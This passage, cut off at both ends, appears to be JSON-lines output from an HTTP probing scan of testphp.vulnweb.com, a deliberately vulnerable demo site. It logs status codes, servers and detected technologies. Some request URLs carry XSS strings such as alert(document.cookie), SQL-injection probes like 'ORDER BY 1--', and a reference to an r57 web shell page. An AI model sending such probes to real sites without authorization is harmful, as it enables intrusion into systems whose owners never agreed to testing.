Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/guestbook.php'\",\"time\":\"346.633003ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:24.854924944Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/hj/va\",\"input\":\"http://testphp.vulnweb.com:80/hj/va\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hj/va\",\"time\":\"346.875367ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:24.867968262Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/hj\",\"input\":\"http://testphp.vulnweb.com:80/hj\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hj\",\"time\":\"347.082606ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:24.868079906Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/guestbook.php\\u003cscript\\u003ealert(document.cookie);\\u003c/scirpt\\u003e\",\"input\":\"http://testphp.vulnweb.com:80/guestbook.php%3Cscript%3Ealert(document.cookie);%3C/scirpt%3E\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/guestbook.php%3Cscript%3Ealert%28document.cookie%29;%3C/scirpt%3E\",\"time\":\"352.902879ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:24.950090919Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/hj/var/www/artists\",\"input\":\"http://testphp.vulnweb.com:80/hj/var/www/artists\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hj/var/www/artists\",\"time\":\"339.380323ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:24.955001389Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/hj/var\",\"input\":\"http://testphp.vulnweb.com:80/hj/var\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hj/var\",\"time\":\"338.510782ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:24.975004002Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/hj/var/www\",\"input\":\"http://testphp.vulnweb.com:80/hj/var/www\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hj/var/www\",\"time\":\"351.094408ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:25.011183053Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/hj/var/www/artists.html\",\"input\":\"http://testphp.vulnweb.com:80/hj/var/www/artists.html\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hj/var/www/artists.html\",\"time\":\"350.37669ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:25.030518828Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/hj/var/www/artists.php\",\"input\":\"http://testphp.vulnweb.com:80/hj/var/www/artists.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hj/var/www/artists.php\",\"time\":\"353.228307ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:25.057266824Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/hj/var/www/listproducts.php\",\"input\":\"http://testphp.vulnweb.com:80/hj/var/www/listproducts.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hj/var/www/listproducts.php\",\"time\":\"344.04213ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:25.063596168Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/hj/var/www/artists.xml\",\"input\":\"http://testphp.vulnweb.com:80/hj/var/www/artists.xml\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hj/var/www/artists.xml\",\"time\":\"355.697982ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:25.110357588Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/hj/var/www/search.php\",\"input\":\"http://testphp.vulnweb.com:80/hj/var/www/search.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hj/var/www/search.php\",\"time\":\"344.048203ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:25.19867145Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/hpp\",\"input\":\"http://testphp.vulnweb.com:80/hpp\",\"location\":\"http://testphp.vulnweb.com/hpp/\",\"title\":\"301 Moved Permanently\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp\",\"time\":\"355.923126ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":301,\"content_length\":169,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:25.232695749Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/hpp/\",\"input\":\"http://testphp.vulnweb.com:80/hpp/\",\"title\":\"HTTP Parameter Pollution Example\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/\",\"time\":\"356.915871ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":7,\"lines\":6,\"status_code\":200,\"content_length\":203,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:26.418905142Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/http://www.atmarine.fi/index.php\",\"input\":\"http://testphp.vulnweb.com:80/http://www.atmarine.fi/index.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/http://www.atmarine.fi/index.php\",\"time\":\"338.769409ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:26.419648682Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/image.php\",\"input\":\"http://testphp.vulnweb.com:80/image.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/image.php\",\"time\":\"353.255092ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:26.421366129Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/index\",\"input\":\"http://testphp.vulnweb.com:80/index\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/index\",\"time\":\"346.866909ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:26.424215737Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/http://testphp.vulnweb.com/artists.php\",\"input\":\"http://testphp.vulnweb.com:80/http://testphp.vulnweb.com/artists.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/http://testphp.vulnweb.com/artists.php\",\"time\":\"351.802783ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:26.432195469Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/hpp/params.php\",\"input\":\"http://testphp.vulnweb.com:80/hpp/params.php?\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php\",\"time\":\"348.636258ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:26.433163731Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/hpp/index.php\",\"input\":\"http://testphp.vulnweb.com:80/hpp/index.php\",\"title\":\"HTTP Parameter Pollution Example\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/index.php\",\"time\":\"350.868254ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":7,\"lines\":6,\"status_code\":200,\"content_length\":203,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:26.433643623Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/hpp/?pp=12\",\"input\":\"http://testphp.vulnweb.com:80/hpp/?pp=12\",\"title\":\"HTTP Parameter Pollution Example\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/?pp=12\",\"time\":\"347.720483ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":12,\"lines\":6,\"status_code\":200,\"content_length\":383,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:26.440902422Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/http://www.localroot.net/r57-txt.html\",\"input\":\"http://testphp.vulnweb.com:80/http://www.localroot.net/r57-txt.html\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/http://www.localroot.net/r57-txt.html\",\"time\":\"355.379769ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:26.442545493Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/hpp/params.ph\",\"input\":\"http://testphp.vulnweb.com:80/hpp/params.ph\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.ph\",\"time\":\"355.172327ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:26.442879493Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/hpp/params.php?p=valid\\u0026pp=12\",\"input\":\"http://testphp.vulnweb.com:80/hpp/params.php?p=valid\\u0026pp=12\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?p=valid\\u0026pp=12\",\"time\":\"355.580278ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":7,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:26.444251853Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/idnf\",\"input\":\"http://testphp.vulnweb.com:80/idnf\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/idnf\",\"time\":\"349.602629ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:26.445419676Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/hpp/index.php?pp=12\",\"input\":\"http://testphp.vulnweb.com:80/hpp/index.php?pp=12\",\"title\":\"HTTP Parameter Pollution Example\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/index.php?pp=12\",\"time\":\"348.435344ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":12,\"lines\":6,\"status_code\":200,\"content_length\":383,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:26.44765647Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/http:/listproducts.php=1'\",\"input\":\"http://testphp.vulnweb.com:80/http:/listproducts.php=1'\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/http:/listproducts.php=1'\",\"time\":\"354.96808ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:26.450812818Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/images\",\"input\":\"http://testphp.vulnweb.com:80/images\",\"location\":\"http://testphp.vulnweb.com/images/\",\"title\":\"301 Moved Permanently\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/images\",\"time\":\"352.609259ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":301,\"content_length\":169,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:27.707950413Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/index.php ORDER BY 1--\",\"input\":\"http://testphp.vulnweb.com:80/index.php%20ORDER%20BY%201--\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/index.php%20ORDER%20BY%201--\",\"time\":\"347.092331ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:27.709016716Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/index.html\",\"input\":\"http://testphp.vulnweb.com:80/index.html\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/index.html\",\"time\":\"356.706855ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:27.709897589Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/index.aspx\",\"input\":\"http://testphp.vulnweb.com:80/index.aspx\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/index.aspx\",\"time\":\"342.854063ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:27.710924763Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/index.php\\u003ch1\\u003etefa\\u003c/h1\\u003e\",\"input\":\"http://testphp.vulnweb.com:80/index.php%3Ch1%3Etefa%3C/h1%3E\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/index.php%3Ch1%3Etefa%3C/h1%3E\",\"time\":\"346.342282ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:27.713978576Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/index.php\\u003cscript\\u003ealert(\\\"mo\\\");\\u003c/script\\u003e\",\"input\":\"http://testphp.vulnweb.com:80/index.php%3Cscript%3Ealert(%22mo%22);%3C/script%3E\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/index.php%3Cscript%3Ealert%28%22mo%22%29;%3C/script%3E\",\"time\":\"360.029389ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:27.714648035Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/index.php'\",\"input\":\"http://testphp.vulnweb.com:80/index.php'\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/index.php'\",\"time\":\"342.882222ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:27.715393686Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/index.bak\",\"input\":\"http://testphp.vulnweb.com:80/index.bak\",\"title\":\"Home of WASP Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/index.bak\",\"time\":\"342.837953ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\"],\"words\":350,\"lines\":91,\"status_code\":200,\"content_length\":3265,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:27.717747921Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/index.php\\u003cscript\\u003ealert(document.cookie);\\u003c/scirpt\\u003e\",\"input\":\"http://testphp.vulnweb.com:80/index.php%3Cscript%3Ealert(document.cookie);%3C/scirpt%3E\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/index.php%3Cscript%3Ealert%28document.cookie%29;%3C/scirpt%3E\",\"time\":\"351.887687ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:27.721867062Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/index.php php\",\"input\":\"http://testphp.vulnweb.com:80/index.php%20php\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/index.php%20php\",\"time\":\"340.918731ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:27.720341774Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/index.php\",\"input\":\"http://testphp.vulnweb.com:80/index.php\",\"title\":\"Home of Acunetix Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/index.php\",\"time\":\"349.06793ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":514,\"lines\":110,\"status_code\":200,\"content_length\":4958,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:27.726398195Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/index.asp\",\"input\":\"http://testphp.vulnweb.com:80/index.asp\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/index.asp\",\"time\":\"348.433318ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:27.726766619Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/index.php cat=1\",\"input\":\"http://testphp.vulnweb.com:80/index.php%20cat=1\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/index.php%20cat=1\",\"time\":\"356.337744ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:27.726969828Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/index.php\\\"\",\"input\":\"http://testphp.vulnweb.com:80/index.php%22\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/index.php%22\",\"time\":\"354.504816ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:29.656006841Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/listproduc...\",\"input\":\"http://testphp.vulnweb.com:80/listproduc...\",\"title\":\"404 Not 